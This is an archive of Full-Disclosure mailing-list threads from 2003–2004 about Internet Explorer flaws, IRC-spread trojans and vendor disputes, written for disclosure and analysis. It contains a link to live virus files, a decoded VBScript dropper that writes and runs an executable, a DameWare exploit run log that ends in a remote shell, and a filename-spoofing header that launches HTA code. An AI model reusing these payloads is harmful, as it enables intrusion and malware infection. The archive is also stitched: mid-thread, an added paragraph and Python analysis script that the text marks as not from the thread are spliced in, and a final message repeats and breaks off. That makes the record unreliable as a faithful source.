  From: Tom Russell 
  To: [EMAIL PROTECTED] 
  Sent: Wednesday, November 05, 2003 9:46 PM
  Subject: [Full-Disclosure] irc.trojan.fgt - new variant.


  Once again, another variant of irc.trojan.fgt is about.
  This one masquerades as a web page - jokes.html, and makes the unfortunate
  recipient say the following:

  http:// home.amis .net/krsve9/Pari/jokes.html lol :D

  (spaces added to URL to prevent accidental infection).

  The virus files are at the following location:
  http://kalleth.2tone-dev.com/fd/jokes-html.zip -
  DO NOT RUN THE EXECUTABLE AS IT IS THE VIRUS. DO NOT OPEN THE HTML PAGE IN
  INTERNET EXPLORER AS IT IS A VIRUS.

  End of message.


Re: [Full-Disclosure] irc.trojan.fgt - new variant.

2003-11-07 Thread Jelmer
Yes, but like you said it uses an angelfire page. If you take it down the
virus is stopped.
If it gets too successful bandwidth limits are exceeded. So it will never
widely spread that way.
If someone were to include a webserver in the worm there's no single point
of failure.




- Original Message - 
From: "ge" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, November 07, 2003 10:04 PM
Subject: RE: [Full-Disclosure] irc.trojan.fgt - new variant.


>
> > I guess It's a matter of time before someone hacks in a http server
> > and makes it send out links like
> > http://victim ip/britney.jpg
> > Luckily microsoft patches stuff within 2 days, balmer said so so it
> > must be true ;)
>
> Since the trojan horse really was "britney.jpg", I hope I am not
> responding to a joke. :)
>
> They already did. Without a hack to it.
>
> It started on the 26th of last months.
>
> britney.jpg came out.
>
> To remind us all, that trojan horse used one of the latest IE
> vulnerabilities to overwrite wmplayer.exe with the trojan horse itself.
> After luring the user to a simple .jpeg, that was actually HTML. So that
> IE thought it got a 404 - file not found HTML response.
>
> Two days passed, and while we saw mimic, which used the same basic way
> to fool a user into clicking on a URL for a picture of a model
> celebrity, did not install any files on the PC, it just spammed itself,
> and DDoS'd Microsoft by multiple port 80 connections.
>
> Every-day since, one to three new trojan horses came out. Always the
> same drill: 1. An angelfire website (mainly),
> http://url/pic-big-name.jpg
>
> (I would like to use this opportunity to commend angelfire again on
> their amazingly fast and serious abuse-mail correspondence and good
> work.)
>
> 2. The trojans always spam the same way, using mIRC's DDE server, with
> "URL << wow !!" as the spam, or something very similar.
> 3. The different files are not clones of one another, although some are
> quite close to being clones, with minor changes to the file name, etc.
> 4. The trojans always install themselves by replacing wmplayer.exe. In
> later variations they copy themselves to a few more locations.
>
> The basic parameters of these trojan horses are the same:
>
> They spam themselves, making sure others would click on that believable
> URL, without any weird ".bat" or ".pif" etc. after the ".jpg" in the
> file name, and then proceed to _seriously_ cripple, although not
> destroy, the user's machine.
>
> The latest "releases" of these trojans are NOT clones.
>
> I believed that the biggest issue with britney.jpg would be copy-cats,
> and that is what scared me.
> I was wrong.
>
> This mal-ware spreads at incredible speed online, infecting and
> destroying an incredible amount of computers (which is reasonable
> considering the amount of us who would click on a URL for a super-model
> picture). and then when the URL dies, a new trojan (or two...
> even three) are released with the exact same modus operandi.
>
> The trojans have two objectives: one - multiply, and then destroy.
> Somewhat of a kamikaze suicide bomber. Lately the boundaries between
> "viruses" and other types of... "viruses" like trojan horses and worms
> are thinning beyond recognition. In my opinion in any case.
>
> The sites are usually exceeding their allowed bandwidth use of the day
> long before they are closed, which comes to show of the enormous
> "clicking" people do.
>
> It is my firm belief that all these trojan horses have a common author,
> and that he himself maintains his trojan's infectious state by just
> releasing more "new" trojan horses to the wild. All just as destructive.
>
> This is the most concentrated assault I have ever seen by a mal-ware
> WRITER, vs. just the mal-ware.
>
> Personally, I don't get it, but that's probably just me.
>
> I hope this information helps somebody out there, hopefully the FBI?
> This attack may be over - although we are not sure yet, but I doubt we
> heard the last of this guy.
>
>   Gadi Evron (i.e. ge),
>   [EMAIL PROTECTED]
>
> 
> [EMAIL PROTECTED] -
> PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID).
> Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741.
>
> The Trojan Horses Research mailing list - http://ecompute.org/th-list
>
> My resume (Hebrew) - http://vapid.reprehensible.net/~ge/resume.rtf
>




Re: [Full-Disclosure] MS03-048: Thor and unpatched?

2003-11-11 Thread Jelmer
liu die yu now maintains an unpatched IE flaws page

http://www.safecenter.net/UMBRELLAWEBV4/DirSvc/security/trie/index.html

I am sure it will pop up there

-- jelmer


- Original Message - 
From: "Paul Szabo" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Tuesday, November 11, 2003 11:29 PM
Subject: [Full-Disclosure] MS03-048: Thor and unpatched?


> Where are Thor and his web page
>
>   http://www.PivX.com/larholm/unpatched/
>
> when we need them? The cumulative IE patch MS03-048 is out, and we would
> like to know what is fixed and what remains.
>
> (Is it known what http://www.pivx.com/qwikfix/ does? Will it remain free?
> Is "Mocrosoft" a mis-spelling or some joke?)
>
> Cheers,
>
> Paul Szabo - [EMAIL PROTECTED]  http://www.maths.usyd.edu.au:8000/u/psz/
> School of Mathematics and Statistics  University of Sydney   2006  Australia
>




Re: [Full-Disclosure] .hta virus analysys

2003-11-20 Thread Jelmer



.hta files are a proprietary concept, and only work in conjunction with
Internet Explorer (specifically version 5 and above). Basically it's much like a
.html except it has no security restrictions.

There are 2 things being encoded in the script you send:
an executable in a string called m
and a piece of vbscript code in a string called c
They seem to be encoded to trick virus scanners into letting them pass.
Decoding the vbscript code we get:

Dim fs, dr, f
Set fs = CreateObject("Scripting.FileSystemObject")
f = "c:\a.exe"
Set dr = fs.CreateTextFile(f, True)
dr.Writeline m
dr.close
Set shell=CreateObject("WScript.Shell")
shell.run(f)
self.close

which basically says: get the embedded .exe file, store it in c:\a.exe, then execute it.
The exe being dropped is identified by Norton as being Trojan.Sinkin

Trojan.Sinkin is a Trojan Horse that changes the Internet Explorer start and search pages, and sends AOL Instant Messenger information to a remote host. This Trojan may also display advertisements when the user is browsing the Web.

Now you know

- Original Message -
From: Jim Duggan
To: [EMAIL PROTECTED]
Sent: Thursday, November 20, 2003 2:31 AM
Subject: [Full-Disclosure] .hta virus analysys

A friend contracted this .hta that seems to edit your profile with a link to itself, http://www.talkstocks.net/
Attached is the hta file it attempts to run. It looks to be encoded, which is something I don't know much about but I'm sure most people on this list will have no problem reading it, just wondering what it does.
Any help appreciated
Thx
Jason
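The post walks through the decoded script by eye; the following is an added example (mine, not from the thread) of triaging such a decoded VBScript dropper statically: it resolves the string variable that the FileSystemObject writes to, matches it against what WScript.Shell runs, and flags the write-then-execute pattern. The sample input is the decoded script quoted above; the function names are my own.

```python
"""Static triage of a decoded VBScript dropper.

Added example, not from the original post. It resolves the simple string
assignments in a decoded script, finds which path a
Scripting.FileSystemObject instance writes to and which path a
WScript.Shell instance runs, and flags the write-then-execute pattern.
"""
import re

# Sample input: the decoded VBScript quoted in the post above.
SAMPLE_VBS = r'''Dim fs, dr, f
Set fs = CreateObject("Scripting.FileSystemObject")
f = "c:\a.exe"
Set dr = fs.CreateTextFile(f, True)
dr.Writeline m
dr.close
Set shell=CreateObject("WScript.Shell")
shell.run(f)
self.close
'''

# Set <var> = CreateObject("<ProgID>")
CREATE_OBJECT = re.compile(r'Set\s+(\w+)\s*=\s*CreateObject\("([^"]+)"\)', re.I)
# <var> = "<literal>"   (one per line; VBScript string assignment)
STR_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.I | re.M)
# <fso>.CreateTextFile(<path>, ...)
CREATE_FILE = re.compile(r'(\w+)\.CreateTextFile\(\s*([^,)]+)', re.I)
# <shell>.run(<target>)  or  <shell>.run <target>
RUN_CALL = re.compile(r'(\w+)\.run\(?\s*([^)\s]+)', re.I)


def _resolve(token, strings):
    """Turn an argument token into a path: a quoted literal or a known variable."""
    token = token.strip()
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return token[1:-1]
    # Unknown identifiers are returned unchanged so the analyst still sees them.
    return strings.get(token.lower(), token)


def analyze_vbscript(source):
    """Return what the script creates, writes and executes, plus a dropper verdict."""
    objects = {var.lower(): progid for var, progid in CREATE_OBJECT.findall(source)}
    strings = {var.lower(): val for var, val in STR_ASSIGN.findall(source)}

    fso_vars = {v for v, p in objects.items() if p.lower() == "scripting.filesystemobject"}
    shell_vars = {v for v, p in objects.items() if p.lower() == "wscript.shell"}

    drops = [_resolve(arg, strings)
             for obj, arg in CREATE_FILE.findall(source) if obj.lower() in fso_vars]
    executes = [_resolve(arg, strings)
                for obj, arg in RUN_CALL.findall(source) if obj.lower() in shell_vars]

    return {
        "objects": sorted(set(objects.values())),
        "drops": drops,          # paths written via FileSystemObject
        "executes": executes,    # paths launched via WScript.Shell
        # A file that is both written and then run is the dropper signature.
        "dropper": bool(set(drops) & set(executes)),
    }


if __name__ == "__main__":
    for key, value in analyze_vbscript(SAMPLE_VBS).items():
        print(f"{key}: {value}")
```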

Re: [Full-Disclosure] .hta virus analysys

2003-11-20 Thread Jelmer
There's nothing wrong with .hta files, but that it has an associated mime
type boggles the mind.
It's been the source of many an issue in the past. Microsoft would be better
off disabling it entirely.



- Original Message - 
From: "Gary Flynn" <[EMAIL PROTECTED]>
Cc: "[Full Disclosure]" <[EMAIL PROTECTED]>
Sent: Thursday, November 20, 2003 9:50 PM
Subject: Re: [Full-Disclosure] .hta virus analysys


> Let's not all get in a tizzy about HTA. They're meant for platform
> application development, not web development. They're treated just
> like .exe files by IE (assuming a lack of defects - no snide
> remarks necessary).
>
> They would seem to make a nice rapid development environment for
> tools for end users because of their web interface and support for
> the full WSH/WMI scripting model. Kind of like TCL/tk in that respect.
>
> Yes, that makes it easier for bad people to do bad things...but so
> does the Internet, email, HTML, and perl.
>
> Just when windows starts shipping with half-way decent tools
> (WSH/WMI/HTA) like unix (sh/perl/tcl/tk) everyone runs amok about
> how insecure they are. Maybe that kind of power and programmability
> shouldn't be available on unmaintained, consumer computers but that
> argument could be extended to cover programmable computers in
> general in the same hands. People click .scr, .pif, .exe, and
> all manner of other attachments every day.
>
> The same power can be used for good too. Several organizations
> wrote quick scripts to clean Blaster infections. Wrapping a browser
> interface around them can make them easier for end users to use.
>
> Whether the file in question is an HTA, exe, sh, or an unknown
> type until the OS translates the MAGIC number, operators have to
> learn not to click them from untrusted sources.
>
> One wonders if everyone would yell about perl's ability to
> exec system commands if we had a population of a couple hundred
> million consumers running unix as root instead of windows
> as administrator.
>
> If there is an argument against HTAs other than that they create
> one more less complex way to create powerful executables (for good
> or bad), I'll readily admit my error. (No fair bringing up
> IE defects that allow them to run in error. I believe similar
> defects have allowed .exe to run too. The source of the problem
> in those cases is obvious and it's not in the language/script
> engine.)
>
> My politically incorrect $0.02 worth.
>
> -- 
> Gary Flynn
> Security Engineer - Technical Services
> James Madison University
>
>




Re: [Full-Disclosure] Comments on 5 IE vulnerabilities

2003-12-02 Thread Jelmer

> When I attended the NTBugtraq Retreat earlier this year, most of the
> attendees were surprised to hear that I am using Internet Explorer on a
> daily basis, particularly since I should know how vulnerable it can be
> at any given time. I surf with JavaScript and ActiveX enabled, see flash
> movies and play Java games, but despite this I am not vulnerable [0] to
> a single command execution vulnerability or system compromise through
> Internet Explorer.
>
> How, you might ask? Simple, I have locked down the My Computer security
> zone on my installations [1].
>
> Each and every command execution vulnerability in Internet Explorer over
> the last few years has depended on the functionality of local
> security zones. Whenever you are crafting an exploit, you want to
> navigate a window object to a local security zone, inject some scripting
> or HTML into the window object and subsequently use the features of the
> local security zone to execute your payload. Properly locking down the
> My Computer zone prevents all of these from having any effect.

each and every ?

http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0301.html

http://www.securitytracker.com/alerts/2003/Jun/1007072.html

etc.. etc.. etc..

please tell me what registry hacks you applied to stop those ;)
What you are suggesting only stops one very specific class of exploits

- It doesn't prevent buffer / heap / integer overflow attacks

- It doesn't stop stealing of session data, which *IS* a big deal in a world
where more and more applications are getting to be web-based.

- It doesn't protect you against broken certificate handling

Posts like this give people a false sense of security: just run our magical
little program and click your heels twice and all the issues will just fade
away. That's not the way it works. At best it adds a layer of security.

> However, changing the Internet Explorer security zone settings is not a
> nimble task. Despite being partly split after IE4, the functionality of
> Windows Explorer and Internet Explorer is still very tightly interwoven.
> If you are not careful you WILL cause your system to malfunction and no
> longer open Explorer folders, launch applications or even boot into
> Windows properly. You need to strike a very sensible balance.
>
> During the course of our research, we crafted and tested solutions to
> this problem on tens of thousands of installations and have beta tested
> on thousands of users, and have incorporated the results into our FREE
> constantly updated Proactive Threat Mitigation application that goes by
> the name of Qwik-Fix(r) ( www.pivx.com/qwikfix/ ). Our beta users were
> never affected by Blaster, HTAExploit or MiMail - to name a few.

Seems valuable, would you consider writing a whitepaper / howto on the
subject?


>
> Now, let's analyze the vulnerabilities Liu Die Yu posted on November
> 25th [2], as there was not much details in the post.
>
> "1stCleanRc" is not a vulnerability of its own, but an example exploit
> detailing how to combine the "MhtRedirParsesLocalFile",
> "BackToFramedJpu" and "MhtRedirLaunchInetExe" vulnerabilities. The same
> goes for "execdror6" which is an example exploit that relies on the
> "LocalZoneInCache" vulnerability, as well as "LocalZoneInCache" which is
> a demonstration of using "threadid10008".
>
> This leaves us with 5 vulnerabilities to analyze:
>
> MhtRedirParsesLocalFile is designed to display and parse a locally
> residing file of any plaintext format in an IFRAME. On most of our
> installations we could only reproduce the display part. Still, being
> able to display a locally residing file in a window object is
> specifically prohibited by IE6 SP1.

I wouldn't classify this one as a vulnerability, it's just a variation of
what mindwarper reported:
he reported that setting the moved temporarily header with a Location forces
parsing of the local file.

now there are a couple of ways to force a redirect, your what mindwarper
used, your plain vanilla http redirect, and pointing to a non-existent mht
file.
Enumerating all possibilities does not constitute a new vulnerability each
and every time, it's like saying, woohoo
 also works  :-o ,
well duh of course it does, but it remains the same issue.


> MhtRedirLaunchInetExe expands a bit on the capabilities of the codeBase
> vulnerability. Microsoft fixed codeBase in the Internet Zone, but left
> it in the My Computer zone. As such, MhtRedirLaunchInetExe simply makes
> it one step easier to bundle HTML, Script and executable payload in the
> same file.
>
> BackToFramedJpu lets you inject javascript URLs into the history and
> have them executed in the context of the target window object.
>

> HijackClickV2 lets you hijack clicks and target them at some system
> dialogs. You will have to know the location of those.
>
> Threadid10008 is intended to download an HTML file to the TIF and
> subsequently display and parse it. It could not be reproduced on all our
> systems, but 

Re: [Full-Disclosure] Internet Explorer JavaScript insecure function

2003-12-07 Thread Jelmer
> I discovered a javascript function (interpreted by Internet Explorer)
> called "file.writeline()" may be potentially dangerous for Internet Explorer
> users. This function allows to write files by means of JavaScript on a hard
> disk.

http://archives.neohapsis.com/archives/win2ksecadvice/2000-q4/0010.html

It could be that you are using an old version of IE and independently
rediscovered this vulnerability but I sincerely doubt it, especially since
you refer to the issue as being in a javascript function, when it was in fact
the possibility to create an ActiveX object that was the issue (writeline
is a method of the filesystem ActiveX object).




[Full-Disclosure] The *real* reason the pivx unpatched IE flaws page was taken offline?

2003-12-11 Thread Jelmer



 
On 12 October PIVX removed the unpatched IE flaws page "for the good of the
internet as a whole"

http://slashdot.org/article.pl?sid=03/10/12/2221205&mode=thread&tid=109&tid=126&tid=128&tid=172&tid=187

Now looking thru the pivx client list http://www.pivx.com/clients.html the
*real* reason becomes blatantly obvious.


Re: [Full-Disclosure] Microsoft's plans for making XP more secure

2003-12-16 Thread Jelmer
Just had a look, the IE part really looks awesome, it appears they had a long
hard look at what kind of stuff people have been throwing at it. And came up
with some nice solutions.

If this really is followed thru upon I think we'll see a *drastic* decrease
in internet explorer vulnerabilities in general and an even more drastic
decrease in vulns of the critical kind, the object caching stuff alone was
good for something like 25 issues over the last years. (a testament to the
intense stupidity of the implementation of that particular feature)

Anyway it's nice to see that microsoft is making some proactive changes
rather than just keep on patching an endless stream of holes.


- Original Message - 
From: "Richard M. Smith" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, December 16, 2003 5:26 PM
Subject: [Full-Disclosure] Microsoft's plans for making XP more secure


> Microsoft has just released a document describing the changes they will be
> making in service pack 2 to make Windows XP more secure.  Many of the
> interesting changes are in Internet Explorer.  The attached links provide
> the details.
>
> Richard M. Smith
> http://www.ComputerBytesMan.com
>
> 
>
> Changes to Functionality in Microsoft Windows XP Service Pack 2
>
> http://tinyurl.com/z0rv
>
> In Microsoft Windows XP Service Pack 2, Microsoft is introducing a set of
> security technologies that will help to improve the ability of Windows
> XP-based computers to withstand malicious attacks from viruses and worms.
> The technologies include network protection, memory protection, safer e-mail
> handling, more secure browsing, and improved computer maintenance.
>
> Together, these security technologies will help to make it more difficult to
> attack Windows XP, even if the latest updates are not applied. These
> security technologies together are particularly useful in mitigation against
> worms and viruses.
>
> This document specifically focuses on the changes between earlier versions
> of Windows XP and Windows XP Service Pack 2 and reflects Microsoft's early
> thinking about Service Pack 2 and its implications for developers. Examples
> and details are provided for several of the technologies that are
> experiencing the biggest changes. Future versions of this document will
> cover all new and changed technologies.
>
> http://tinyurl.com/z2zv
>
> . Safer e-mail handling. Security technologies help to stop viruses
> (such as SoBig.F) that spread through e-mail and instant messaging. These
> technologies include default settings that are more secure, improved
> attachment control for Outlook Express and Windows Messenger, and increased
> Outlook Express security and reliability. As a result, potentially unsafe
> attachments that are sent through e-mail and instant messages are isolated
> so that they cannot affect other parts of the system.
>
> . More secure browsing. Security technologies that are delivered in
> Microsoft Internet Explorer provide improved protection against malicious
> content on the Web. One enhancement includes locking down the Local Machine
> zone to prevent against the running of malicious scripts and fortifying
> against harmful Web downloads. Additionally, better user controls and user
> interfaces are provided that help prevent malicious ActiveX(R) controls and
> spyware from running on customers' systems without their knowledge and
> consent.
>
>




Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

2003-12-19 Thread Jelmer
If this is legit

from a /. interview :

--snip--
John Markoff had first libeled me in his book, Cyberpunk, which he
co-authored with his former wife, Katie Hafner. In and around 1990, Markoff
and Hafner contacted me to request my participation for a book about three
hackers, including myself. In considering their request, I asked about their
budget to compensate me for my time and/or life story rights. Both Markoff
and Hafner were unwilling to compensate me as a source, because it was
unethical. I explained that it was unethical for me to give them my story
for free. We were at an impasse
--snip--

from the site :

--snip--
If your story makes it into the book, you'll receive a free copy of my first
book, The Art of Deception, plus a rare Advanced Reader's Copy of the new
one with your story in it -- both signed by me with a personal inscription
to you in your real name or your handle or pseudonym.
--snip--

That's definitely more ethical ;)


- Original Message - 
From: "Kevin Mitnick" <[EMAIL PROTECTED]>
To: "'Adik'" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Saturday, December 20, 2003 12:30 AM
Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit


> Hi all!
>
>
> I'm sorry for my absence from the list for the past few months, but I have
> been very busy traveling outside the US, and my mail account was
> experiencing problems.  Now that I am receiving the messages again, I have
> been playing "catch up," by reading the old posts.
>
> I do have some good news, and was hoping that some of you might be able to
> assist me.  I have been commissioned by Wiley & Sons to write a second book,
> which is tentatively titled, "The Art of Intrusion."  This book will
> chronicle detailed accounts of real, untold hacks by the perpetrators who
> did it, and I will provide a security analysis and describe how the attack
> could be mitigated/prevented in today's environment.  I am going to tell the
> story from the perpetrator's stance, not just from research obtained from
> law enforcement officials and records.
>
> I am looking for former/retired hackers that would be willing to tell me the
> details of their sexiest hack.  I am not interested in the run-of-the-mill
> attacks such as, exploiting RPC DCOM, but rather creative ones that
> incorporated technical, physical and/or social engineering aspects.
>
>
>
> I am offering $500 for the most provocative story that makes it into the
> book, and if the person wishes, we can protect their anonymity by the use of
> a handle.  All contributors selected for the book, will receive a copy of
> both books autographed by the authors.
>
> I should have more information up on FreeKevin.com today, as well as
> DefensiveThinking.com.  If someone would like to contact me with a story or
> a possible lead on a storyteller, please write to me at
> [EMAIL PROTECTED], or call at (310)689-7229.  I would appreciate
> any assistance you can offer.
>
> All my best,
>
>
>
> Kevin Mitnick
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Adik
> Sent: Friday, December 19, 2003 8:38 AM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
> Overflow Exploit
>
> DameWare Mini Remote Control Server Exploit
>
> C:\xploits\dmware>dmware
>
> ...oO DameWare Remote Control Server Overflow Exploit Oo...
>
> -( by Adik netmaniac[at]hotmail.KG )-
>
>  - Versions vulnerable: <= DWRCS 3.72.0.0
>  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1
>
>  Usage: dmware
>  eg: dmware 10.0.0.1 6129 10.0.0.2 21
>
>
> C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53
>
> ...oO DameWare Remote Control Server Overflow Exploit Oo...
>
> -( by Adik netmaniac[at]hotmail.KG )-
>
>  - Versions vulnerable: <= DWRCS 3.72.0.0
>  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1
>
> [*] Target IP:  192.168.63.130  Port: 6129
> [*] Local IP:   192.168.63.1Listening Port: 53
>
> [*] Initializing sockets... [ OK ]
> [*] Binding to local port: 53...[ OK ]
> [*] Setting up a listener...[ OK ]
>
>  OS Info   : WIN2000 [ver 5.0.2195]
>  SP String : Service Pack 3
>
>  EIP: 0x77db912b (advapi32.dll)
>
> [*] Constructing packet for WIN 2000 SP: 3...   [ OK ]
> [*] Connecting to 192.168.63.130:6129...[ OK ]
> [*] Packet injected!
> [*] Connection request accepted: 192.168.63.130:1056
> [*] Dropping to shell...
>
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
>
> C:\WINNT\system32>exit
> exit
> [x] Connection closed.
>
> C:\xploits\dmware>
>
> --
> cheerz,
>
> Adik
>
>



Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

2003-12-19 Thread Jelmer
In that case you probably will want to update your site
http://www.defthi.com/main/CallforHackers.html since it mentions another
arrangement.


- Original Message - 
From: "Kevin Mitnick" <[EMAIL PROTECTED]>
To: "'Jelmer'" <[EMAIL PROTECTED]>; "'Adik'" <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Saturday, December 20, 2003 1:56 AM
Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit


> The difference is that I'm offering $500 for the best story of a single hack,
> and I'm willing to pay $200 for each story that makes the final draft.
>
> Markoff would not agree to pay one dime.
>
> Cheers,
>
> Kevin Mitnick
>
> Check out http://www.zdnet.com.au for the story
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Jelmer
> Sent: Friday, December 19, 2003 4:03 PM
> To: Kevin Mitnick; 'Adik'; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
> Server Overflow Exploit
>
> If this is legit
>
> from a /. interview :
>
> --snip--
> John Markoff had first libeled me in his book, Cyberpunk, which he
> co-authored with his former wife, Katie Hafner. In and around 1990, Markoff
> and Hafner contacted me to request my participation for a book about three
> hackers, including myself. In considering their request, I asked about their
> budget to compensate me for my time and/or life story rights. Both Markoff
> and Hafner were unwilling to compensate me as a source, because it was
> unethical. I explained that it was unethical for me to give them my story
> for free. We were at an impasse
> --snip--
>
> from the site :
>
> --snip--
> If your story makes it into the book, you'll receive a free copy of my first
> book, The Art of Deception, plus a rare Advanced Reader's Copy of the new
> one with your story in it -- both signed by me with a personal inscription
> to you in your real name or your handle or pseudonym.
> --snip--
>
> That's definitely more ethical ;)
>
>
> - Original Message - 
> From: "Kevin Mitnick" <[EMAIL PROTECTED]>
> To: "'Adik'" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
> <[EMAIL PROTECTED]>
> Sent: Saturday, December 20, 2003 12:30 AM
> Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
> Server Overflow Exploit
>
>
> > Hi all!
> >
> >
> > I'm sorry for my absence from the list for the past few months, but I have
> > been very busy traveling outside the US, and my mail account was
> > experiencing problems.  Now that I am receiving the messages again, I have
> > been playing "catch up," by reading the old posts.
> >
> > I do have some good news, and was hoping that some of you might be able to
> > assist me.  I have been commissioned by Wiley & Sons to write a second book,
> > which is tentatively titled, "The Art of Intrusion."  This book will
> > chronicle detailed accounts of real, untold hacks by the perpetrators who
> > did it, and I will provide a security analysis and describe how the attack
> > could be mitigated/prevented in today's environment.  I am going to tell the
> > story from the perpetrator's stance, not just from research obtained from
> > law enforcement officials and records.
> >
> > I am looking for former/retired hackers that would be willing to tell me the
> > details of their sexiest hack.  I am not interested in the run-of-the-mill
> > attacks such as, exploiting RPC DCOM, but rather creative ones that
> > incorporated technical, physical and/or social engineering aspects.
> >
> >
> >
> > I am offering $500 for the most provocative story that makes it into the
> > book, and if the person wishes, we can protect their anonymity by the use of
> > a handle.  All contributors selected for the book, will receive a copy of
> > both books autographed by the authors.
> >
> > I should have more information up on FreeKevin.com today, as well as
> > DefensiveThinking.com.  If someone would like to contact me with a story or
> > a possible lead on a storyteller, please write to me at
> > [EMAIL PROTECTED], or call at (310)689-7229.  I would appreciate
> > any assistance you can offer.
> >
> > All my best,
> >
> >
> >
> > Kevin Mitnick
> >
> > -Original Message-
> > From: [EMAIL PROTECTED]
> > [mailto:[EMAIL PROTECTED] On 

Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6

2004-01-27 Thread Jelmer
Good boy, here's a cookie

- Original Message - 
From: "Thor Larholm" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Wednesday, January 28, 2004 1:16 AM
Subject: Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6


> You're not very detailed about what happens behind the curtain, so here
> goes :)
>
> When an HTTP request returns its data, IE tries to determine the MIME
> type based on several factors [0]. In this case, IE determines that it
> cannot render the data as HTML since there is a Content-Disposition
> header - Content-Disposition is used whenever you e.g. output a binary
> file from a serverside script and want the filename to be displayed as
> "ProjectScope.doc" instead of "download.php" (your scripts name).
>
> The Content-Disposition HTTP header itself is not to blame, it is a
> standard MIME header from RFC 1806 that has been widely implemented in
> all browsers precisely to allow arbitrary filenaming.
>
> Since IE cannot display the data itself, it displays the Open/SaveAs
> dialog box so that the user can decide. The %2E in the filename is URL
> decoded and displayed as a . (dot) in the dialog. This URL decoding
> should simply not be performed as we are dealing with a file dialog and
> not a URL dialog, if %2E had not been decoded we would not be having
> this issue.
>
> Whatever action the user takes is then handled by Windows Explorer, we
> are now no longer dealing with IE. Windows Explorer determines what
> application to open the data with based on lesser rules than Internet
> Explorer, for one it does not look at the Content-Type header since it
> does not know about it. The first step of action is to compare the file
> extensions, only in the case of an unknown file extension does Windows
> Explorer perform its "magic filetype" guessing by inspecting the files
> content.
>
> The file extension in Windows is no longer limited to 3 characters,
> though historical reasons have kept most application extensions confined
> to these. Windows Explorer parses the filename, excluding its path, and
> determines that the file extension is everything following the last .
> (dot) character, in this case ".{GUID}%2Efunny.mpeg". Common extensions
> are either a set of printable characters or a GUID, with the latter
> having priority over the former. After this, a lookup is performed in
> the registry for HKCR\CLSID\.GUID and HKCR\.EXT, with EXT being the file
> extension that we discovered and GUID the CLSID we found, and a match is
> found for the GUID prior to the entire file extension. The GUID points
> at "HTML Application" which points at MSHTA.EXE, which is then used to
> display the data.
>
> As with the ".Folder" issue, this definitely eases social engineering.
> Internet Explorer should not URL decode strings for file dialogs and
> Windows Explorer should not give precedence to CLSID's.
>
>
> [0] http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp
>
>
>
> Regards
>
> Thor Larholm
> Senior Security Researcher
> PivX Solutions
> 24 Corporate Plaza #180
> Newport Beach, CA 92660
> http://www.pivx.com
> [EMAIL PROTECTED]
> Phone: +1 (949) 231-8496
> PGP: 0x5A276569
> 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
>
> PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
> Qwik-Fix 
>
> - Original Message - 
> From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, January 27, 2004 9:28 AM
> Subject: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6
>
>
> >
> >
> > Tuesday, January 27, 2004
> >
> > Trivial file spoofing in Internet Explorer 6.0.2800.1106 and all
> > of 'its' patches to date on WIN XP [probably others]:
> >
> > Content-Disposition: attachment; filename=malware.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}fun_ball_gites_pie_throw%2Empeg"
> >
> > Absolute bare minimum working demo [perhaps even feeble] as we
> > are absolutely confident the self-appointed resident gooroo will
> > be along shortly handing out packets of two cents to everyone
> > thus saving us the effort to illustrate in even greater detail
> > to those lacking imagination:
> >
> >
> > http://www.malware.com/gooroo.html
> >
> >
> >
> > End Call
> >
> > -- 
> > http://www.malware.com
> >
> >
> >
> >
> >
> >


Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6

2004-01-27 Thread Jelmer
Good boy here's a cookie

- Original Message - 
From: "Thor Larholm" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Wednesday, January 28, 2004 1:16 AM
Subject: Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6


> You're not very detailed about what happens behind the curtain, so here
> goes :)
>
> When an HTTP request returns its data, IE tries to determine the MIME
> type based on several factors [0]. In this case, IE determines that it
> cannot render the data as HTML since there is a Content-Disposition
